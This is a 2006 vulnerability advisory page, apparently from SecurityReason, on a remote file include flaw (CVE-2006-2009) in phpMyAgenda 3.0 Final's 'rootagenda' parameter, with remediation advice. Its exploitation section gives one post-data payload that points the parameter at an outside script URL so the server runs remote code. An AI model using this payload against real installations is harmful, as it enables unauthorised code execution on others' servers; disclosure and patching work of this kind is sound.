|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | phpMyAgenda 3.0 Final - Remote File Include Vulnerability
|
SecurityAlert : 787
CVE : CVE-2006-2009
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : admin majorsecurity de
Published : 27.04.2006
Affected Software : | phpMyAgenda 3.0 Final |
 Advisory Content : [MajorSecurity] phpMyAgenda 3.0 Final - Remote File Include Vulnerability
--------------------------------------------------------
Software: phpMyAgenda
Version: 3.0 Final
Type: Remote File Include Vulnerability
Date: April, 24th 2006
Vendor: phpMyAgenda
Page: http://phpmyagenda.com
Risc: High
Credits:
----------------------------
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
Affected Products:
----------------------------
phpMyAgenda 3.0 Final and prior
Description:
----------------------------
phpMyAgenda is a complete web application that allows you to manage
and publish events (concert, meetings, etc...).
It stores description, dates, places, contacts, event registrations, and
event polls.
Requirements:
----------------------------
register_globals = On
Vulnerability:
----------------------------
Input passed to the "rootagenda" parameter in "agenda.php3" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from
external resources.
Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".
Exploitation:
----------------------------
Post data:
rootagenda=http://www.yourspace.com/yourscript.php?
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|